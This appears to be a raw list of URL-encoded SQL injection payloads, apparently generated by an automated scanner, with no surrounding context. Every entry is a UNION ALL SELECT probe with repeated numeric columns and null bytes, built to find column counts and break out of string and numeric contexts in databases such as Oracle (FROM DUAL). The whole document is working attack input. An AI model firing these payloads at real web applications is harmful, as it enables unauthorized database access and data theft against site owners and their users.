-8557%27%20%7C%7C%20%28SELECT%209570%20WHERE%204276%3D4276%20UNION%20ALL%20SELECT%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%2C%204276%00%20%29%20%7C%7C%20%27 -2429%27%20%7C%7C%20%28SELECT%209624%20WHERE%207797%3D7797%20UNION%20ALL%20SELECT%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%2C%207797%00%20%29%20%7C%7C%20%27 -2746%27%20%7C%7C%20%28SELECT%201502%20WHERE%206358%3D6358%20UNION%20ALL%20SELECT%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%2C%206358%00%20%29%20%7C%7C%20%27 -9632%27%20%7C%7C%20%28SELECT%202190%20WHERE%204851%3D4851%20UNION%20ALL%20SELECT%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%00%20%29%20%7C%7C%20%27 -5879%27%20%7C%7C%20%28SELECT%202571%20WHERE%203192%3D3192%20UNION%20ALL%20SELECT%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%00%20%29%20%7C%7C%20%27 -6815%27%20%7C%7C%20%28SELECT%203834%20WHERE%209926%3D9926%20UNION%20ALL%20SELECT%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%2C%209926%00%20%29%20%7C%7C%20%27 -8339%20%2B%20%28SELECT%205405%20FROM%20DUAL%20WHERE%206464%3D6464%20UNION%20ALL%20SELECT%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%00%20%29 -4875%20%2B%20%28SELECT%205302%20FROM%20DUAL%20WHERE%209645%3D9645%20UNION%20ALL%20SELECT%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%2C%209645%00%20%29 -8088%20%2B%20%28SELECT%209479%20FROM%20DUAL%20WHERE%208876%3D8876%20UNION%20ALL%20SELECT%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%2C%208876%00%20%29 -4370%20%2B%20%28SELECT%206413%20FROM%20DUAL%20WHERE%209858%3D9858%20UNION%20ALL%20SELECT%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%00%20%29 -8365%20%2B%20%28SELECT%205616%20FROM%20DUAL%20WHERE%204700%3D4700%20UNION%20ALL%20SELECT%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%00%20%29 -5311%20%2B%20%28SELECT%209808%20FROM%20DUAL%20WHERE%202034%3D2034%20UNION%20ALL%20SELECT%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%2C%202034%00%20%29 -8460%20%2B%20%28SELECT%209138%20FROM%20DUAL%20WHERE%202263%3D2263%20UNION%20ALL%20SELECT%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%2C%202263%00%20%29 -4405%20%2B%20%28SELECT%208167%20FROM%20DUAL%20WHERE%209782%3D9782%20UNION%20ALL%20SELECT%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%00%20%29 -1632%20%2B%20%28SELECT%207751%20FROM%20DUAL%20WHERE%202572%3D2572%20UNION%20ALL%20SELECT%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%00%20%29 -9131%20%2B%20%28SELECT%203605%20FROM%20DUAL%20WHERE%203265%3D3265%20UNION%20ALL%20SELECT%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%2C%203265%00%20%29 -1852%20%2B%20%28SELECT%207742%20WHERE%207469%3D7469%20UNION%20ALL%20SELECT%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%2C%207469%00%20%29 -4129%20%2B%20%28SELECT%208276%20WHERE%204757%3D4757%20UNION%20ALL%20SELECT%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%2C%204757%00%20%29 -7883%20%2B%20%28SELECT%203575%20WHERE%209292%3D9292%20UNION%20ALL%20SELECT%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%00%20%29 -8291%20%2B%20%28SELECT%203784%20WHERE%201682%3D1682%20UNION%20ALL%20SELECT%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%2C%201682%00%20%29 -9593%20%2B%20%28SELECT%208356%20WHERE%201844%3D1844%20UNION%20ALL%20SELECT%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%2C%201844%00%20%29 -6754%20%2B%20%28SELECT%201660%20WHERE%201901%3D1901%20UNION%20ALL%20SELECT%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%00%20%29 -2292%20%2B%20%28SELECT%209333%20WHERE%204929%3D4929%20UNION%20ALL%20SELECT%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%2C%204929%00%20%29 -2388%20%2B%20%28SELECT%203452%20WHERE%207505%3D7505%20UNION%20ALL%20SELECT%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%2C%207505%00%20%29 -9130%20%2B%20%28SELECT%205695%20WHERE%201336%3D1336%20UNION%20ALL%20SELECT%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%00%20%29 -6575%20%2B%20%28SELECT%203707%20WHERE%207012%3D7012%20UNION%20ALL%20SELECT%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%2C%207012%00%20%29 -7682%27%20%2B%20%28SELECT%20%27KMQD%27%20FROM%20DUAL%20WHERE%207913%3D7913%20UNION%20ALL%20SELECT%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%2C%207913%00%20%29%20%2B%20%27 -3406%27%20%2B%20%28SELECT%20%27YBnI%27%20FROM%20DUAL%20WHERE%203262%3D3262%20UNION%20ALL%20SELECT%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%2C%203262%00%20%29%20%2B%20%27 -9013%27%20%2B%20%28SELECT%20%27Lnpz%27%20FROM%20DUAL%20WHERE%202925%3D2925%20UNION%20ALL%20SELECT%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%2C%202925%00%20%29%20%2B%20%27 -9008%27%20%2B%20%28SELECT%20%27tzjx%27%20FROM%20DUAL%20WHERE%201280%3D1280%20UNION%20ALL%20SELECT%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%00%20%29%20%2B%20%27 -4346%27%20%2B%20%28SELECT%20%27ihOZ%27%20FROM%20DUAL%20WHERE%207367%3D7367%20UNION%20ALL%20SELECT%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%2C%207367%00%20%29%20%2B%20%27 -2511%27%20%2B%20%28SELECT%20%27lrpf%27%20FROM%20DUAL%20WHERE%208273%3D8273%20UNION%20ALL%20SELECT%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%2C%208273%00%20%29%20%2B%20%27 -6630%27%20%2B%20%28SELECT%20%27PnXh%27%20FROM%20DUAL%20WHERE%204804%3D4804%20UNION%20ALL%20SELECT%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%00%20%29%20%2B%20%27 -8573%27%20%2B%20%28SELECT%20%27OazB%27%20FROM%20DUAL%20WHERE%205117%3D5117%20UNION%20ALL%20SELECT%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%00%20%29%20%2B%20%27 -8054%27%20%2B%20%28SELECT%20%27FTxU%27%20FROM%20DUAL%20WHERE%209999%3D9999%20UNION%20ALL%20SELECT%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%2C%209999%00%20%29%20%2B%20%27 -7523%27%20%2B%20%28SELECT%20%27tpwn%27%20FROM%20DUAL%20WHERE%202273%3D2273%20UNION%20ALL%20SELECT%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%2C%202273%00%20%29%20%2B%20%27 -4425%27%20%2B%20%28SELECT%20%27IxJp%27%20WHERE%207399%3D7399%20UNION%20ALL%20SELECT%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%00%20%29%20%2B%20%27 -1564%27%20%2B%20%28SELECT%20%27ZPcd%27%20WHERE%202373%3D2373%20UNION%20ALL%20SELECT%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%2C%202373%00%20%29%20%2B%20%27 -6719%27%20%2B%20%28SELECT%20%27rasP%27%20WHERE%203726%3D3726%20UNION%20ALL%20SELECT%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%00%20%29%20%2B%20%27 -7026%27%20%2B%20%28SELECT%20%27aVJR%27%20WHERE%209481%3D9481%20UNION%20ALL%20SELECT%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%00%20%29%20%2B%20%27 -5688%27%20%2B%20%28SELECT%20%27gBMF%27%20WHERE%205445%3D5445%20UNION%20ALL%20SELECT%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%2C%205445%00%20%29%20%2B%20%27 -4613%27%20%2B%20%28SELECT%20%27gOar%27%20WHERE%201138%3D1138%20UNION%20ALL%20SELECT%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%00%20%29%20%2B%20%27 -1147%27%20%2B%20%28SELECT%20%27LPBY%27%20WHERE%201782%3D1782%20UNION%20ALL%20SELECT%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%2C%201782%00%20%29%20%2B%20%27 